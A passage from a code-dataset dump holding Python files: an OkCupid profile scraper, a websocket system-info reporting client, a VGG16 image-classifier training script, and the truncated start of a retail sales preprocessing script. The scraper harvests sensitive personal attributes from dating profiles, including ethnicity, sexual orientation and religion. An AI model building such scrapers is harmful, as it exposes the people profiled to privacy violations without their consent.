"usage_type": "call"}, {"api_name": "TA_functions.display_centroids", "line_number": 424, "usage_type": "call"}, {"api_name": "TA_functions.centroid2fulldetector", "line_number": 428, "usage_type": "call"}, {"api_name": "TA_functions.display_centroids", "line_number": 443, "usage_type": "call"}, {"api_name": "TA_functions.get_mindiff", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 457, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 459, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 460, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 461, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 463, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 464, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 465, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 466, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 467, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 479, "usage_type": "call"}, {"api_name": "os.path", "line_number": 479, "usage_type": "attribute"}, {"api_name": "TA_functions.writePixPos", "line_number": 481, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 525, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 525, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 528, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 528, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 529, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 529, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 530, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 530, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 552, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 552, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 553, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 553, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 554, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 554, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.vlines", "line_number": 555, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 555, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 557, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 557, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 559, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 559, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 560, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 560, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 561, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 561, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 562, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 562, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 575, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 575, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 582, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 582, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 583, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 583, "usage_type": "name"}, {"api_name": "TA_functions.runTEST", "line_number": 639, "usage_type": "call"}, {"api_name": "TA_functions.get_stats", "line_number": 646, "usage_type": "call"}, {"api_name": "TA_functions.runTEST", "line_number": 657, "usage_type": "call"}, {"api_name": "TA_functions.get_stats", "line_number": 664, "usage_type": "call"}, {"api_name": "TA_functions.runTEST", "line_number": 675, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 697, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 698, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 699, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 700, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 701, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 702, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 703, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 704, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 705, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 706, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 707, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 708, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 709, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 710, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 711, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 712, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 713, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 714, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 714, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 715, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 715, "usage_type": "call"}, {"api_name": "TA_functions.get_stats", "line_number": 722, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 734, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 734, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 737, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 737, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 738, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 738, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 739, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 739, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 767, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 767, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 768, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 768, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 769, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 769, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.vlines", "line_number": 770, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 770, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 772, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 772, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 773, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 773, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 774, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 774, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 775, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 775, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 776, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 776, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 777, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 777, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 788, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 788, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 794, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 794, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 795, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 795, "usage_type": "name"}, {"api_name": "TA_functions.printTESTresults", "line_number": 834, "usage_type": "call"}, {"api_name": "TA_functions.remove_bad_stars", "line_number": 947, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 950, "usage_type": "call"}, {"api_name": "TA_functions.remove_bad_stars", "line_number": 954, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1019, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1019, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 1060, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1061, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1063, "usage_type": "call"}, {"api_name": "v2v3plots.make_plot", "line_number": 1066, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1074, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1074, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 1079, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1080, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1086, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1087, "usage_type": "call"}, {"api_name": "v2v3plots.make_plot", "line_number": 1094, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1224, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 1237, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1237, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 1347, "usage_type": "call"}]} +{"seq_id": "424727106", "text": "from scrapy.spiders import Spider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.selector import Selector\nfrom scrapy.http import HtmlResponse\nfrom ok_cupid_crawler.items import OkCupidCrawlerItem\nfrom scrapy.http import Request\nfrom scrapy.utils.serialize import ScrapyJSONEncoder\nimport re\nfrom okCrawlerTools import extract_start_urls\n\n#\n#\n#
  • \n#
  • \n#
  • \n#
    \n#
    \n#
    \n#
    \n#
    \n#
    \n#dd id=\"ajax_smoking\"\n#
    \n#
    \n#
    \n#
    \n#
    \n#
    \n#
    \n\nclass okcSpider(Spider):\n # Description\n name = \"okCrawler\"\n allowed_domains = \"www.okcupid.com\"\n urls = extract_start_urls(\"okcLinks.txt\")\n #start_urls = [\"http://www.okcupid.com/profile/jab1980\", \"http://www.okcupid.com/profile/20neight10\"]\n start_urls = urls\n _encoder = ScrapyJSONEncoder()\n\n def parse(self, response):\n #hxs = HtmlXPathSelector(response)\n #titles = hxs.select(STUUFFFS).extract()\n sel = Selector(response)\n titles = sel.xpath('//script').extract()[0]\n \n item = OkCupidCrawlerItem()\n item[\"usr_loc\"] = response.xpath('.//title/text()').extract() \n item[\"gender\"] = response.xpath('.//span[contains(@class,\"ajax_gender\")]/text()').extract()\n item[\"race\"] = response.xpath('.//dd[contains(@id,\"ajax_ethnicities\")]/text()').extract()\n item[\"gentation\"] = response.xpath('.//li[contains(@id,\"ajax_gentation\")]/text()').extract() \n item[\"looking_for\"] = response.xpath('.//li[contains(@id,\"ajax_lookingfor\")]/text()').extract() \n item[\"smokes\"] = response.xpath('.//dd[contains(@id,\"ajax_smoking\")]/text()').extract()\n item[\"drinks\"] = response.xpath('.//dd[contains(@id,\"ajax_drinking\")]/text()').extract()\n item[\"offspring\"] = response.xpath('.//dd[contains(@id,\"ajax_offspring\")]/text()').extract() \n item[\"education\"] = response.xpath('.//dd[contains(@id,\"ajax_education\")]/text()').extract() \n item[\"religion\"] = response.xpath('.//dd[contains(@id,\"ajax_religion\")]/text()').extract() \n item[\"language\"] = response.xpath('.//dd[contains(@id,\"ajax_speaks\")]/text()').extract() \n item[\"text\"] = response.xpath('.//div[contains(@class, \"essay\")]/text()').extract()\n item[\"text\"] = [(itm.replace('\\r', ' ').replace('\\n', ' ')) for itm in item[\"text\"]] \n \n yield item", "sub_path": "ok_cupid_crawler/ok_cupid_crawler/spiders/okcSpider.py", "file_name": "okcSpider.py", "file_ext": "py", "file_size_in_byte": 2706, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "scrapy.spiders.Spider", "line_number": 31, "usage_type": "name"}, {"api_name": "okCrawlerTools.extract_start_urls", "line_number": 35, "usage_type": "call"}, {"api_name": "scrapy.utils.serialize.ScrapyJSONEncoder", "line_number": 38, "usage_type": "call"}, {"api_name": "scrapy.selector.Selector", "line_number": 43, "usage_type": "call"}, {"api_name": "ok_cupid_crawler.items.OkCupidCrawlerItem", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "433160952", "text": "import re\nimport json\nimport time\nimport logging\nimport socket\nimport asyncio\nimport subprocess\nfrom subprocess import PIPE\nfrom multiprocessing import Manager, Process\n\n\nimport websockets\nfrom websockets.exceptions import ConnectionClosed\n\n\nclass Minion:\n def __init__(self, rest=5):\n self.gru = None\n self.name = ''\n self.rest_time = rest\n self.hostname = socket.gethostname()\n # self.storage = {}\n self.storage = Manager().dict()\n\n def _hi_gru(self):\n # Send some initial info to Gru\n self._get_sys_data()\n return json.dumps(self.storage.copy())\n\n async def _process_gru_msg(self, msg):\n matched = re.match(r'^\\[(.+?)\\](.+)', msg)\n if matched:\n print(matched)\n print(msg)\n order, content = matched.groups()\n\n if order == 'name':\n self.name = content\n else:\n await self.gru.send(\"Maybe it's not an order: {}\".format(msg))\n # logging.info(\"Maybe it's not an order: {}\".format(msg))\n\n def _get_sys_data(self):\n commands = {\n 'cpu_num': 'grep processor /proc/cpuinfo | wc -l',\n 'cpu_mod': \"grep 'model name' /proc/cpuinfo | uniq | awk -F':' '{print $2}'\",\n 'mem_size': \"awk '/MemTotal/ {print $2}' /proc/meminfo\",\n 'root_size': \"df -Th | grep -E '/$'\",\n 'uname': 'uname -a'\n }\n\n jobs = []\n for dtype, cmd in commands.items():\n one_job = Process(target=self._execute, args=(dtype, cmd))\n jobs.append(one_job)\n\n for job in jobs:\n job.start()\n job.join() # join to wait sys data\n\n def _execute(self, datatype, cmd: str):\n pipe = subprocess.run(cmd, stdout=PIPE, stderr=PIPE, shell=True)\n std_out = pipe.stdout.decode().strip()\n # std_err = pipe.stderr.decode().strip()\n # print(\"stdout: {}\".format(std_out))\n # print(\"stderr: {}\".format(std_err))\n\n self.storage[datatype] = std_out\n\n async def _find_gru(self, uri):\n try:\n gru = await websockets.connect(uri)\n return gru\n except ConnectionRefusedError as ex:\n logging.info(\"Cannot connect to Gru: {}\".format(self._find_gru.__name__))\n logging.info(str(ex))\n return None\n\n async def work(self, uri):\n # Loop for reconnecting Gru\n while True:\n self.gru = await self._find_gru(uri)\n\n # Cannot connect to Gru\n if not self.gru:\n logging.info('Rest {} seconds, and retry finding Gru: {}'.format(self.rest_time, self.work.__name__))\n time.sleep(self.rest_time)\n continue\n\n await self.gru.send(self._hi_gru())\n\n try:\n # Loop for communicating to Gru\n while True:\n gru_msg = await self.gru.recv()\n logging.info(\"Gru said: {}\".format(gru_msg))\n await self._process_gru_msg(gru_msg)\n\n except ConnectionClosed as ex:\n logging.error('Gru died T T')\n logging.info(str(ex))\n logging.info('Rest {} seconds, and retry finding Gru: {}'.format(self.rest_time, self.work.__name__))\n\n time.sleep(self.rest_time)\n continue\n\n\nif __name__ == '__main__':\n logging.basicConfig(format='[%(asctime)s][%(levelname)s]: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO)\n logging.info(\"Finding Gru ...\")\n minion = Minion()\n asyncio.get_event_loop().run_until_complete(minion.work('ws://localhost:8000/ws'))\n", "sub_path": "minion.py", "file_name": "minion.py", "file_ext": "py", "file_size_in_byte": 3714, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "socket.gethostname", "line_number": 21, "usage_type": "call"}, {"api_name": "multiprocessing.Manager", "line_number": 23, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 28, "usage_type": "call"}, {"api_name": "re.match", "line_number": 31, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 54, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 62, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 62, "usage_type": "name"}, {"api_name": "websockets.connect", "line_number": 72, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 75, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 86, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 87, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 96, "usage_type": "call"}, {"api_name": "websockets.exceptions.ConnectionClosed", "line_number": 99, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 100, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 101, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 102, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 104, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 109, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 111, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 112, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "493499593", "text": "import numpy as np\nfrom keras import applications\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils import to_categorical\nfrom keras import optimizers\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dropout, Flatten, Dense\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.preprocessing import LabelBinarizer\nimport pickle\nimport matplotlib.pyplot as plt\n\n\nimg_width, img_height = 100, 100\ntop_model_weights_path = 'fc_model.h5'\nmodel_path = 'cnn_model.h5'\nepochs = 100 #100\nbatch_size = 32 #32\nnum_classes = 5\nsplit_num = 5 #5\n\n\ndef cnn_train_model(train_data,train_label,class_weights):\n # construct vgg-16 model without fully connected layer\n base_model = applications.VGG16(weights='imagenet', include_top=False, input_shape=(img_height, img_width, 3))\n print('Model loaded.',len(base_model.layers))\n\n # construct fully connected layer\n top_model = Sequential()\n top_model.add(Flatten(input_shape=base_model.output_shape[1:]))\n top_model.add(Dense(256, activation='relu'))\n top_model.add(Dropout(0.5))\n top_model.add(Dense(num_classes, activation='softmax'))\n print('top-model added')\n\n\n #top_model.load_weights(top_model_weights_path)\n #print('top model weight load')\n\n # concatenate the the non-top vgg-16 model and fully connected layer\n model = Model(inputs=base_model.input, outputs=top_model(base_model.output))\n\n # frozen the fist 14 layers of vgg-16 model\n for layer in model.layers[:15]:\n layer.trainable = False\n\n # set loss function and optimizer\n model.compile(loss='categorical_crossentropy',\n optimizer=optimizers.SGD(lr=1e-4, momentum=0.9),\n metrics=['accuracy'])\n\n\n #checkpoint = ModelCheckpoint(best_weight_path, monitor='val_acc', verbose=1, save_best_only=True, mode='max')\n #callbacks_list = [checkpoint]\n\n #set k-fold cross validation\n kfold = StratifiedKFold(n_splits=split_num, shuffle=True, random_state=0)\n val_acc_scores = [] #to record the history of val_acc\n train_loss_scores = [] #to record the hostory of train_loss\n train_acc_scores = [] #to record the history of train_acc\n lb = LabelBinarizer()\n\n for train,validation in kfold.split(train_data,train_label):\n\n #transform string labels into binarizer\n train_label_bin = lb.fit_transform(train_label)\n\n\n # train dataset generator\n train_datagen = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n fill_mode=\"nearest\",\n )\n\n train_generator = train_datagen.flow(\n train_data[train],\n train_label_bin[train],\n batch_size=batch_size,\n )\n\n # validation dataset generator\n validation_datagen = ImageDataGenerator(rescale=1. / 255)\n\n validation_generator = validation_datagen.flow(\n train_data[validation],\n train_label_bin[validation],\n batch_size=batch_size,\n )\n\n # train the model\n h = model.fit_generator(\n train_generator,\n samples_per_epoch=len(train_data[train]) // batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=len(train_data[validation] // batch_size),\n class_weight=class_weights,\n )\n\n #predict the model with validation dataset\n vc_scores = model.evaluate_generator(validation_generator,validation_generator.__sizeof__())\n\n print(\"val_%s: %.2f%%\" % (model.metrics_names[1],vc_scores[1]*100))\n\n #add history to corresponding lists\n train_loss_scores.append(h.history[\"loss\"])\n train_acc_scores.append(h.history[\"acc\"])\n val_acc_scores.append(h.history[\"val_acc\"])\n\n print(\"val_acc = %.2f%% (+/- %.2f%%)\" % (np.mean(val_acc_scores), np.std(val_acc_scores)))\n train_loss_scores = np.array(train_loss_scores).ravel()\n train_acc_scores = np.array(train_acc_scores).ravel()\n val_acc_scores = np.array(val_acc_scores).ravel()\n\n # save the model to disk\n print(\"serializing neural network...\")\n model.save(model_path)\n\n # save the label binarizer to disk\n print(\"serializing label binarizer...\")\n f = open(\"lb.pickle\", \"wb\")\n f.write(pickle.dumps(lb))\n f.close()\n\n\n #plot the training loss and validation accuracy\n plt.style.use(\"ggplot\")\n x = np.arange(0, split_num * epochs)\n plt.figure()\n plt.subplot(1,2,1)\n plt.plot(x, train_loss_scores, label=\"train loss\")\n plt.plot(x, train_acc_scores, label=\"train accuracy\")\n plt.title(\"Training Loss and Accuracy\")\n plt.xlabel(\"Epoch * K-fold N_split\")\n plt.ylabel(\"Loss/Accuracy\")\n plt.legend(loc = \"upper left\")\n plt.subplot(1,2,2)\n plt.plot(x, val_acc_scores)\n plt.title(\"Validation Accuracy\")\n plt.xlabel(\"Epoch * K-fold N_split\")\n plt.ylabel(\"Validation Accuracy\")\n plt.savefig(\"acc_loss_plot\")\n\n", "sub_path": "TrainCNNModel.py", "file_name": "TrainCNNModel.py", "file_ext": "py", "file_size_in_byte": 5679, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "keras.applications.VGG16", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.applications", "line_number": 26, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 31, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.optimizers.SGD", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 50, "usage_type": "name"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 58, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelBinarizer", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 71, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 131, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}]} +{"seq_id": "186147986", "text": "# -*- coding: utf-8 -*-\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nimport time\r\n\r\nstart_time = time.time()\r\n\r\n# Import Data\r\ntrain = pd.read_csv('train.csv',header=0)\r\nweather = pd.read_csv('weather.csv',header=0)\r\nkey = pd.read_csv('key.csv',header=0)\r\ntest = pd.read_csv('test.csv',header=0)\r\nweather_idx = np.load('weather_idx.npy')\r\nsampleSub = pd.read_csv('sampleSubmission.csv',header=0)\r\nweather_idx_test = np.load('weather_idx_test.npy')\r\n\r\n# Enumerate Training Dates\r\ntrain['year'] = [int(x[0:4]) for x in list(train['date'])]\r\nstart_year = np.min(train['year'])\r\ntrain['year'] = train['year']-start_year\r\ntrain['month'] = [int(x[5:7]) for x in list(train['date'])]\r\ntrain['day'] = [int(x[8:]) for x in list(train['date'])]\r\ntrain = train.drop(['date'],axis=1)\r\n\r\n# Get Weekday Values\r\ntrain['month_days'] = 0\r\ntrain['month_days'][train['month']==2] = 31\r\ntrain['month_days'][train['month']==3] = 28+31\r\ntrain['month_days'][train['month']==4] = 31+28+31\r\ntrain['month_days'][train['month']==5] = 30+31+28+31\r\ntrain['month_days'][train['month']==6] = 31+30+31+28+31\r\ntrain['month_days'][train['month']==7] = 30+31+30+31+28+31\r\ntrain['month_days'][train['month']==8] = 31+30+31+30+31+28+31\r\ntrain['month_days'][train['month']==9] = 31+31+30+31+30+31+28+31\r\ntrain['month_days'][train['month']==10] = 30+31+31+30+31+30+31+28+31\r\ntrain['month_days'][train['month']==11] = 31+30+31+31+30+31+30+31+28+31\r\ntrain['month_days'][train['month']==12] = 30+31+30+31+31+30+31+30+31+28+31\r\ntrain['month_days'][(train['year']==0)&(train['month']!=1)&(train['month']!=2)] = 1 + train['month_days'][train['year']==0]\r\ntrain['year_days']=0\r\ntrain['year_days'][train['year']==1]=366\r\ntrain['year_days'][train['year']==2]=366+365\r\ntrain['total_days'] = 0\r\ntrain['total_days'] = train[['day','month_days','year_days']].sum(axis=1)\r\ntrain['weekday'] = 0\r\ntrain['weekday'] = train['total_days'].mod(7)\r\ntrain = train.drop(['month_days','year_days','total_days'],axis=1)\r\n\r\n# Enumerate Weather Dates\r\nweather['year'] = [int(x[0:4]) for x in list(weather['date'])]\r\nweather['year'] = weather['year']-start_year\r\nweather['month'] = [int(x[5:7]) for x in list(weather['date'])]\r\nweather['day'] = [int(x[8:]) for x in list(weather['date'])]\r\nweather = weather.drop(['date'],axis=1)\r\n\r\n# Fill col_list with all unique codesum values from codesum strings\r\ncol_list = []\r\nfor i in range(0,len(weather)):\r\n temp = weather['codesum'][i].split()\r\n num_codes = len(temp)\r\n for i2 in range(0,len(temp)):\r\n if temp[i2] in weather.columns:\r\n weather.ix[i,temp[i2]] = 1\r\n else:\r\n weather[temp[i2]] = 0\r\n weather.ix[i,temp[i2]] = 1\r\n col_list.append(temp[i2])\r\n\r\n# Add codesum Values\r\nfor i in range(0,len(col_list)):\r\n train[col_list[i]] = 0\r\n train[col_list[i]] = weather.ix[weather_idx,col_list[i]].values\r\n\r\n# Save Important Values\r\nnum_stores = len(train['store_nbr'].unique())\r\nnum_items = len(train['item_nbr'].unique())\r\n\r\n# Create Training Datasets\r\ntrain_in_all = train.drop(['units'],axis=1).copy()\r\ntrain_out_all = train['units']\r\n\r\n# Create Training & Validation Datasets\r\nnum_train = int(round(.9*len(train_in_all)))\r\nnum_val = int(len(train_in_all)-num_train)\r\ntrain_ind = 